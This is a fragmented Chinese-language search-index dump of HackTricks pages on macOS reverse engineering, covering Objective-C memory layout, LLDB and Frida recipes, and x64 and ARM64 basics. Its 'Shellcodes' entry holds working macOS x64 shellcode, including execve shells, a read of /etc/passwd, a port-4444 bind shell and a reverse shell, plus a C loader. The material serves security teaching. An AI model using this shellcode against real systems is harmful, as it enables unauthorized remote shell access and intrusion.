Primitive types use their first letter of the type i for int, c for char, l for long... and use the capital letter in case it\'s unsigned (L for unsigned long). Other data types use other letters or symbols like q for long long, b for 位域, B for 布尔值, # for 类, @ for id, * for char *, ^ for 通用指针 and ? for undefined. Arrays, structures and unions use [, { and ( respectively. Example Method Declaration objectivec - (NSString *)processString:(id)input withOptions:(char *)options andError:(id)error; selector 将会是 processString:withOptions:andError: 类型编码 id 被编码为 @ char * 被编码为 * 该方法的完整类型编码为: less @24@0:8@16*20^@24 详细分解 返回类型 (NSString *):编码为 @,长度为 24 self(对象实例):编码为 @,偏移量为 0 _cmd(选择子):编码为 :,偏移量为 8 第一个参数 (char * input):编码为 *,偏移量为 16 第二个参数 (NSDictionary * options):编码为 @,偏移量为 20 第三个参数 (NSError ** error):编码为 ^@,偏移量为 24 通过选择子和编码,你可以重建该方法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Type Encoding","id":"2077","title":"Type Encoding"},"2078":{"body":"Objective‑C 中的类是具有属性、方法指针等的 C 结构体。可以在 source code 中找到 struct objc_class: objectivec struct objc_class : objc_object {\\n// Class ISA;\\nClass superclass;\\ncache_t cache; // formerly cache pointer and vtable\\nclass_data_bits_t bits; // class_rw_t * plus custom rr/alloc flags class_rw_t *data() {\\nreturn bits.data();\\n}\\nvoid setData(class_rw_t *newData) {\\nbits.setData(newData);\\n} void setInfo(uint32_t set) {\\nassert(isFuture() || isRealized());\\ndata()->setFlags(set);\\n}\\n[...] 这个类使用 isa 字段的一些位来表示关于类的信息。 然后,该 struct 有一个指向存储在磁盘上的 class_ro_t 结构的指针,后者包含类的属性,例如名称、base methods、properties 和实例变量。在运行时,还会使用一个额外的 class_rw_t 结构来保存可被修改的指针,例如 methods、protocols、properties。 macOS Objective-C","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 类","id":"2078","title":"类"},"2079":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 内存中的现代对象表示 (arm64e, tagged pointers, Swift)","id":"2079","title":"内存中的现代对象表示 (arm64e, tagged pointers, Swift)"},"208":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Pentesting IPv6","id":"208","title":"Pentesting IPv6"},"2080":{"body":"在 Apple Silicon 和较新的运行时中,Objective‑C 的 isa 并不总是一个原始的类指针。在 arm64e 上,它是一个打包结构,可能还携带 Pointer Authentication Code (PAC)。根据平台不同,它可能包含诸如 nonpointer、has_assoc、weakly_referenced、extra_rc 等字段,以及类指针本身(可能被移位或带符号)。这意味着盲目地解引用 Objective‑C 对象的前 8 个字节并不总能得到有效的 Class 指针。 在 arm64e 上调试时的实用注意事项: LLDB 在使用 po 打印 Objective‑C 对象时通常会为你去除 PAC 位,但在处理原始指针时可能需要手动去除认证: lldb (lldb) expr -l objc++ -- #include \\n(lldb) expr -l objc++ -- void *raw = ptrauth_strip((void*)0x000000016f123abc, ptrauth_key_asda);\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)raw) Mach‑O 中的许多函数/数据指针会位于 __AUTH/__AUTH_CONST,在使用前需要进行认证。如果你在进行 interposing 或 re‑binding(例如 fishhook‑style),请确保除了传统的 __got 之外也处理 __auth_got。 有关语言/ABI 保证以及 Clang/LLVM 提供的 intrinsics 的深入解析,请参见本页末尾的参考资料。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 非指针 isa 与指针认证 (arm64e)","id":"2080","title":"非指针 isa 与指针认证 (arm64e)"},"2081":{"body":"一些 Foundation 类通过将对象的有效载荷直接编码在指针值中来避免堆分配(tagged pointers)。不同平台的检测方式不同(例如在 arm64 上是最高有效位,而在 x86_64 macOS 上是最低有效位)。tagged 对象在内存中没有常规的 isa;运行时会通过 tag 位解析类。在检查任意 id 值时: 使用运行时 API,而不是直接探查 isa 字段:object_getClass(obj) / [obj class]。 在 LLDB 中,直接 po (id)0xADDR 会正确打印 tagged pointer 实例,因为会咨询运行时以解析类。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Tagged pointer 对象","id":"2081","title":"Tagged pointer 对象"},"2082":{"body":"纯 Swift 类也是对象,其头部指向 Swift 元数据(而不是 Objective‑C 的 isa)。要在不修改进程的情况下检查运行中的 Swift 进程,可以使用 Swift toolchain 的 swift-inspect,它利用 Remote Mirror 库来读取运行时元数据: bash # Xcode toolchain (or Swift.org toolchain) provides swift-inspect\\nswift-inspect dump-raw-metadata \\nswift-inspect dump-arrays \\n# On Darwin additionally:\\nswift-inspect dump-concurrency 在对混合 Swift/ObjC 应用进行逆向时,这对于映射 Swift 堆对象和协议遵从性非常有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Swift 堆对象与元数据","id":"2082","title":"Swift 堆对象与元数据"},"2083":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 运行时检查速查表 (LLDB / Frida)","id":"2083","title":"运行时检查速查表 (LLDB / Frida)"},"2084":{"body":"从原始指针打印对象或类: lldb (lldb) expr -l objc++ -O -- (id)0x0000000101234560\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)0x0000000101234560) 在 breakpoint 中,从指向对象方法的 self 的指针检查 Objective‑C class: lldb (lldb) br se -n \'-[NSFileManager fileExistsAtPath:]\'\\n(lldb) r\\n... breakpoint hit ...\\n(lldb) po (id)$x0 # self\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)$x0) 转储携带 Objective‑C 元数据的节(注意:许多现在位于 __DATA_CONST / __AUTH_CONST): lldb (lldb) image dump section --section __DATA_CONST.__objc_classlist\\n(lldb) image dump section --section __DATA_CONST.__objc_selrefs\\n(lldb) image dump section --section __AUTH_CONST.__auth_got 读取已知类对象的内存以在反向工程方法列表时转向 class_ro_t / class_rw_t: lldb (lldb) image lookup -r -n _OBJC_CLASS_$_NSFileManager\\n(lldb) memory read -fx -s8 0xADDRESS_OF_CLASS_OBJECT","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » LLDB","id":"2084","title":"LLDB"},"2085":{"body":"Frida 提供高级的运行时桥接,非常适合在没有符号的情况下发现并对实时对象进行插桩: 枚举类和方法,在运行时解析实际类名,并拦截 Objective‑C 选择器: js if (ObjC.available) {\\n// List a class\' methods\\nconsole.log(ObjC.classes.NSFileManager.$ownMethods); // Intercept and inspect arguments/return values\\nconst impl = ObjC.classes.NSFileManager[\'- fileExistsAtPath:isDirectory:\'].implementation;\\nInterceptor.attach(impl, {\\nonEnter(args) {\\nthis.path = new ObjC.Object(args[2]).toString();\\n},\\nonLeave(retval) {\\nconsole.log(\'fileExistsAtPath:\', this.path, \'=>\', retval);\\n}\\n});\\n} Swift bridge: 枚举 Swift 类型并与 Swift 实例交互(需要较新的 Frida;在 Apple Silicon 目标上非常有用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Frida (Objective‑C and Swift)","id":"2085","title":"Frida (Objective‑C and Swift)"},"2086":{"body":"Clang/LLVM: Pointer Authentication and the intrinsics (arm64e ABI). https://clang.llvm.org/docs/PointerAuthentication.html Apple objc 运行时头文件(tagged pointers、non‑pointer isa 等),例如 objc-object.h. https://opensource.apple.com/source/objc4/objc4-818.2/runtime/objc-object.h.auto.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 参考资料","id":"2086","title":"参考资料"},"2087":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Introduction to x64","id":"2087","title":"Introduction to x64"},"2088":{"body":"x64,也称为 x86-64,是一种主要用于桌面和服务器计算的 64 位处理器架构。它起源于 Intel 生产的 x86 架构,后来被 AMD 采用并命名为 AMD64,现今是个人计算机和服务器中普遍使用的架构。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Introduction to x64","id":"2088","title":"Introduction to x64"},"2089":{"body":"x64 在 x86 架构的基础上扩展,具有 16 个通用寄存器 ,标记为 rax、rbx、rcx、rdx、rbp、rsp、rsi、rdi,以及 r8 到 r15。每个寄存器可以存储一个 64 位 (8 字节)值。这些寄存器还具有 32 位、16 位和 8 位的子寄存器,以便于兼容性和特定任务。 rax - 传统上用于 函数的返回值 。 rbx - 通常用作内存操作的 基址寄存器 。 rcx - 常用于 循环计数器 。 rdx - 在各种角色中使用,包括扩展算术操作。 rbp - 堆栈帧的 基指针 。 rsp - 堆栈指针 ,跟踪堆栈的顶部。 rsi 和 rdi - 用于字符串/内存操作中的 源 和 目标 索引。 r8 到 r15 - 在 x64 中引入的额外通用寄存器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Registers","id":"2089","title":"Registers"},"209":{"body":"","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 基础理论","id":"209","title":"IPv6 基础理论"},"2090":{"body":"x64 的调用约定在不同操作系统之间有所不同。例如: Windows :前 四个参数 通过寄存器 rcx 、 rdx 、 r8 和 r9 传递。进一步的参数被推入堆栈。返回值在 rax 中。 System V(通常用于类 UNIX 系统) :前 六个整数或指针参数 通过寄存器 rdi 、 rsi 、 rdx 、 rcx 、 r8 和 r9 传递。返回值也在 rax 中。 如果函数有超过六个输入, 其余参数将通过堆栈传递 。 RSP ,堆栈指针,必须 16 字节对齐 ,这意味着它指向的地址在任何调用发生之前必须能被 16 整除。这意味着通常我们需要确保在进行函数调用之前,RSP 在我们的 shellcode 中是正确对齐的。然而,在实践中,即使不满足此要求,系统调用通常也能正常工作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Calling Convention","id":"2090","title":"Calling Convention"},"2091":{"body":"Swift 有其自己的 调用约定 ,可以在 https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Calling Convention in Swift","id":"2091","title":"Calling Convention in Swift"},"2092":{"body":"x64 指令集丰富,保持与早期 x86 指令的兼容性,并引入了新的指令。 mov : 移动 一个值从一个 寄存器 或 内存位置 到另一个。 示例:mov rax, rbx — 将 rbx 中的值移动到 rax。 push 和 pop :将值推入或弹出 堆栈 。 示例:push rax — 将 rax 中的值推入堆栈。 示例:pop rax — 将堆栈顶部的值弹出到 rax。 add 和 sub : 加法 和 减法 操作。 示例:add rax, rcx — 将 rax 和 rcx 中的值相加,并将结果存储在 rax 中。 mul 和 div : 乘法 和 除法 操作。注意:这些在操作数使用方面有特定行为。 call 和 ret :用于 调用 和 从函数返回 。 int :用于触发软件 中断 。例如,int 0x80 用于 32 位 x86 Linux 的系统调用。 cmp : 比较 两个值并根据结果设置 CPU 的标志。 示例:cmp rax, rdx — 比较 rax 和 rdx。 je、jne、jl、jge、... : 条件跳转 指令,根据先前的 cmp 或测试结果改变控制流。 示例:在 cmp rax, rdx 指令之后,je label — 如果 rax 等于 rdx,则跳转到 label。 syscall :在某些 x64 系统(如现代 Unix)中用于 系统调用 。 sysenter :在某些平台上的优化 系统调用 指令。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Common Instructions","id":"2092","title":"Common Instructions"},"2093":{"body":"推送旧的基指针 :push rbp(保存调用者的基指针) 将当前堆栈指针移动到基指针 :mov rbp, rsp(为当前函数设置新的基指针) 在堆栈上分配局部变量的空间 :sub rsp, (其中 是所需的字节数)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Function Prologue","id":"2093","title":"Function Prologue"},"2094":{"body":"将当前基指针移动到堆栈指针 :mov rsp, rbp(释放局部变量) 从堆栈中弹出旧的基指针 :pop rbp(恢复调用者的基指针) 返回 :ret(将控制权返回给调用者)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Function Epilogue","id":"2094","title":"Function Epilogue"},"2095":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » macOS","id":"2095","title":"macOS"},"2096":{"body":"有不同类别的系统调用,您可以 在这里找到它们 : c #define SYSCALL_CLASS_NONE\\t0\\t/* Invalid */\\n#define SYSCALL_CLASS_MACH\\t1\\t/* Mach */\\n#define SYSCALL_CLASS_UNIX\\t2\\t/* Unix/BSD */\\n#define SYSCALL_CLASS_MDEP\\t3\\t/* Machine-dependent */\\n#define SYSCALL_CLASS_DIAG\\t4\\t/* Diagnostics */\\n#define SYSCALL_CLASS_IPC\\t5\\t/* Mach IPC */ 然后,您可以在 此网址 中找到每个系统调用号: c 0\\tAUE_NULL\\tALL\\t{ int nosys(void); } { indirect syscall }\\n1\\tAUE_EXIT\\tALL\\t{ void exit(int rval); }\\n2\\tAUE_FORK\\tALL\\t{ int fork(void); }\\n3\\tAUE_NULL\\tALL\\t{ user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }\\n4\\tAUE_NULL\\tALL\\t{ user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }\\n5\\tAUE_OPEN_RWTC\\tALL\\t{ int open(user_addr_t path, int flags, int mode); }\\n6\\tAUE_CLOSE\\tALL\\t{ int close(int fd); }\\n7\\tAUE_WAIT4\\tALL\\t{ int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); }\\n8\\tAUE_NULL\\tALL\\t{ int nosys(void); } { old creat }\\n9\\tAUE_LINK\\tALL\\t{ int link(user_addr_t path, user_addr_t link); }\\n10\\tAUE_UNLINK\\tALL\\t{ int unlink(user_addr_t path); }\\n11\\tAUE_NULL\\tALL\\t{ int nosys(void); } { old execv }\\n12\\tAUE_CHDIR\\tALL\\t{ int chdir(user_addr_t path); }\\n[...] 为了从 Unix/BSD 类 调用 open 系统调用 ( 5 ),您需要添加它:0x2000000 因此,调用 open 的系统调用编号将是 0x2000005","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » syscalls","id":"2096","title":"syscalls"},"2097":{"body":"编译: bash nasm -f macho64 shell.asm -o shell.o\\nld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib 提取字节: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh\\nfor c in $(objdump -d \\"shell.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n \'\\\\\\\\x\'$c\\ndone # Another option\\notool -t shell.o | grep 00 | cut -f2 -d$\'\\\\t\' | sed \'s/ /\\\\\\\\x/g\' | sed \'s/^/\\\\\\\\x/g\' | sed \'s/\\\\\\\\x$//g\' 测试 shellcode 的 C 代码\\nc // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c\\n// gcc loader.c -o loader\\n#include \\n#include \\n#include \\n#include int (*sc)(); char shellcode[] = \\"\\"; int main(int argc, char **argv) {\\nprintf(\\"[>] Shellcode Length: %zd Bytes\\\\n\\", strlen(shellcode)); void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); if (ptr == MAP_FAILED) {\\nperror(\\"mmap\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mmap\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", ptr); void *dst = memcpy(ptr, shellcode, sizeof(shellcode));\\nprintf(\\"[+] SUCCESS: memcpy\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", dst); int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); if (status == -1) {\\nperror(\\"mprotect\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mprotect\\\\n\\");\\nprintf(\\" |-> Return = %d\\\\n\\", status); printf(\\"[>] Trying to execute shellcode...\\\\n\\"); sc = ptr;\\nsc(); return 0;\\n} Shell 取自 这里 并进行了解释。 with adr\\n使用堆栈 armasm bits 64\\nglobal _main\\n_main:\\ncall r_cmd64\\ndb \'/bin/zsh\', 0\\nr_cmd64: ; the call placed a pointer to db (argv[2])\\npop rdi ; arg1 from the stack placed by the call to l_cmd64\\nxor rdx, rdx ; store null arg3\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall armasm bits 64\\nglobal _main _main:\\nxor rdx, rdx ; zero our RDX\\npush rdx ; push NULL string terminator\\nmov rbx, \'/bin/zsh\' ; move the path into RBX\\npush rbx ; push the path, to the stack\\nmov rdi, rsp ; store the stack pointer in RDI (arg1)\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall 使用 cat 读取 目标是执行 execve(\\"/bin/cat\\", [\\"/bin/cat\\", \\"/etc/passwd\\"], NULL),因此第二个参数 (x1) 是一个参数数组(在内存中这意味着一堆地址)。 armasm bits 64\\nsection .text\\nglobal _main _main:\\n; Prepare the arguments for the execve syscall\\nsub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` lea rdi, [rel cat_path] ; rdi will hold the address of \\"/bin/cat\\"\\nlea rsi, [rel passwd_path] ; rsi will hold the address of \\"/etc/passwd\\" ; Create inside the stack the array of args: [\\"/bin/cat\\", \\"/etc/passwd\\"]\\npush rsi ; Add \\"/etc/passwd\\" to the stack (arg0)\\npush rdi ; Add \\"/bin/cat\\" to the stack (arg1) ; Set in the 2nd argument of exec the addr of the array\\nmov rsi, rsp ; argv=rsp - store RSP\'s value in RSI xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) push 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall ; Make the syscall section .data\\ncat_path: db \\"/bin/cat\\", 0\\npasswd_path: db \\"/etc/passwd\\", 0 使用 sh 调用命令 armasm bits 64\\nsection .text\\nglobal _main _main:\\n; Prepare the arguments for the execve syscall\\nsub rsp, 32 ; Create space on the stack ; Argument array\\nlea rdi, [rel touch_command]\\npush rdi ; push &\\"touch /tmp/lalala\\"\\nlea rdi, [rel sh_c_option]\\npush rdi ; push &\\"-c\\"\\nlea rdi, [rel sh_path]\\npush rdi ; push &\\"/bin/sh\\" ; execve syscall\\nmov rsi, rsp ; rsi = pointer to argument array\\nxor rdx, rdx ; rdx = NULL (no env variables)\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall _exit:\\nxor rdi, rdi ; Exit status code 0\\npush 1 ; put 1 on the stack (exit syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall section .data\\nsh_path: db \\"/bin/sh\\", 0\\nsh_c_option: db \\"-c\\", 0\\ntouch_command: db \\"touch /tmp/lalala\\", 0 Bind shell 来自 https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html 的 Bind shell 在 port 4444 armasm section .text\\nglobal _main\\n_main:\\n; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)\\nxor rdi, rdi\\nmul rdi\\nmov dil, 0x2\\nxor rsi, rsi\\nmov sil, 0x1\\nmov al, 0x2\\nror rax, 0x28\\nmov r8, rax\\nmov al, 0x61\\nsyscall ; struct sockaddr_in {\\n; __uint8_t sin_len;\\n; sa_family_t sin_family;\\n; in_port_t sin_port;\\n; struct in_addr sin_addr;\\n; char sin_zero[8];\\n; };\\nmov rsi, 0xffffffffa3eefdf0\\nneg rsi\\npush rsi\\npush rsp\\npop rsi ; bind(host_sockid, &sockaddr, 16)\\nmov rdi, rax\\nxor dl, 0x10\\nmov rax, r8\\nmov al, 0x68\\nsyscall ; listen(host_sockid, 2)\\nxor rsi, rsi\\nmov sil, 0x2\\nmov rax, r8\\nmov al, 0x6a\\nsyscall ; accept(host_sockid, 0, 0)\\nxor rsi, rsi\\nxor rdx, rdx\\nmov rax, r8\\nmov al, 0x1e\\nsyscall mov rdi, rax\\nmov sil, 0x3 dup2:\\n; dup2(client_sockid, 2)\\n; -> dup2(client_sockid, 1)\\n; -> dup2(client_sockid, 0)\\nmov rax, r8\\nmov al, 0x5a\\nsub sil, 1\\nsyscall\\ntest rsi, rsi\\njne dup2 ; execve(\\"//bin/sh\\", 0, 0)\\npush rsi\\nmov rdi, 0x68732f6e69622f2f\\npush rdi\\npush rsp\\npop rdi\\nmov rax, r8\\nmov al, 0x3b\\nsyscall 反向 Shell 来自 https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html 的反向 shell。反向 shell 到 127.0.0.1:4444 armasm section .text\\nglobal _main\\n_main:\\n; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)\\nxor rdi, rdi\\nmul rdi\\nmov dil, 0x2\\nxor rsi, rsi\\nmov sil, 0x1\\nmov al, 0x2\\nror rax, 0x28\\nmov r8, rax\\nmov al, 0x61\\nsyscall ; struct sockaddr_in {\\n; __uint8_t sin_len;\\n; sa_family_t sin_family;\\n; in_port_t sin_port;\\n; struct in_addr sin_addr;\\n; char sin_zero[8];\\n; };\\nmov rsi, 0xfeffff80a3eefdf0\\nneg rsi\\npush rsi\\npush rsp\\npop rsi ; connect(sockid, &sockaddr, 16)\\nmov rdi, rax\\nxor dl, 0x10\\nmov rax, r8\\nmov al, 0x62\\nsyscall xor rsi, rsi\\nmov sil, 0x3 dup2:\\n; dup2(sockid, 2)\\n; -> dup2(sockid, 1)\\n; -> dup2(sockid, 0)\\nmov rax, r8\\nmov al, 0x5a\\nsub sil, 1\\nsyscall\\ntest rsi, rsi\\njne dup2 ; execve(\\"//bin/sh\\", 0, 0)\\npush rsi\\nmov rdi, 0x68732f6e69622f2f\\npush rdi\\npush rsp\\npop rdi\\nxor rdx, rdx\\nmov rax, r8\\nmov al, 0x3b\\nsyscall tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Shellcodes","id":"2097","title":"Shellcodes"},"2098":{"body":"Reading time: 46 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » ARM64v8 简介","id":"2098","title":"ARM64v8 简介"},"2099":{"body":"在 ARMv8 架构中,执行级别,称为 异常级别 (ELs),定义了执行环境的权限等级和能力。共有四个异常级别,从 EL0 到 EL3,每个级别承担不同的职责: EL0 - 用户模式 : 这是权限最低的级别,用于执行常规应用代码。 在 EL0 运行的应用相互以及与系统软件隔离,增强了安全性和稳定性。 EL1 - 操作系统内核模式 : 大多数操作系统内核在此级别运行。 EL1 的权限高于 EL0,可访问系统资源,但为了保证系统完整性存在一些限制。 EL2 - Hypervisor 模式 : 此级别用于虚拟化。运行在 EL2 的 hypervisor 可以在相同物理硬件上管理多个操作系统(每个在其各自的 EL1 中运行)。 EL2 提供对虚拟化环境的隔离和控制功能。 EL3 - Secure Monitor 模式 : 这是权限最高的级别,通常用于安全引导和受信任执行环境。 EL3 可以管理和控制安全态与非安全态之间的访问(例如 secure boot、trusted OS 等)。 这些级别的使用提供了一种结构化且安全的方式来管理系统的不同方面,从用户应用到最高权限的系统软件。ARMv8 对权限级别的设计有助于有效隔离不同系统组件,从而增强系统的安全性和健壮性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 异常级别 - EL (ARM64v8)","id":"2099","title":"异常级别 - EL (ARM64v8)"},"21":{"body":"caution 本书《HackTricks》仅用于教育和信息目的。书中的内容是按“现状”提供的,作者和出版商不对书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作出任何明示或暗示的陈述或保证。你对这些信息的任何依赖均由你自行承担风险。 作者和出版商在任何情况下均不对因使用本书而导致的任何损失或损害承担责任,包括但不限于间接或后果性损失或损害,或因数据或利润损失而产生的任何损失或损害。 此外,本书中描述的技术和技巧仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动,使用本书中包含的信息的风险和判断完全由用户自行承担。 用户对基于本书中包含的信息采取的任何行动负全部责任,并应在尝试实施本书中描述的任何技术或技巧时始终寻求专业建议和帮助。 使用本书即表示用户同意解除作者和出版商对因使用本书或其中任何信息而可能导致的任何损害、损失或伤害的责任和责任。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks Values & FAQ » 免责声明","id":"21","title":"免责声明"},"210":{"body":"IPv6 地址的结构旨在增强网络组织和设备交互。IPv6 地址分为: 网络前缀 :前 48 位,确定网络段。 子网 ID :接下来的 16 位,用于定义网络内的特定子网。 接口标识符 :最后 64 位,唯一标识子网内的设备。 虽然 IPv6 省略了 IPv4 中的 ARP 协议,但引入了 ICMPv6 ,其主要消息有两个: 邻居请求 (NS) :用于地址解析的组播消息。 邻居通告 (NA) :对 NS 的单播响应或自发公告。 IPv6 还包含特殊地址类型: 回环地址 (::1) :相当于 IPv4 的 127.0.0.1,用于主机内部通信。 链路本地地址 (FE80::/10) :用于本地网络活动,不用于互联网路由。处于同一本地网络的设备可以使用此范围相互发现。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 网络","id":"210","title":"网络"},"2100":{"body":"ARM64 有 31 个通用寄存器 ,标记为 x0 到 x30。每个寄存器可以存储 64-bit (8 字节)值。对于仅需 32 位值的操作,可以使用 w0 到 w30 访问同一寄存器的 32 位模式。 x0 到 x7 - 通常用作临时寄存器和用于向子例程传递参数。 x0 也承载函数的返回数据。 x8 - 在 Linux 内核中,x8 用作 svc 指令的系统调用号。 在 macOS 中实际使用的是 x16! x9 到 x15 - 更多的临时寄存器,通常用于局部变量。 x16 和 x17 - 过程内调用寄存器(Intra-procedural Call Registers) 。用于存放立即数的临时寄存器。它们也用于间接函数调用和 PLT(Procedure Linkage Table)存根。 x16 在 macOS 中被用作 svc 指令的 系统调用号 。 x18 - 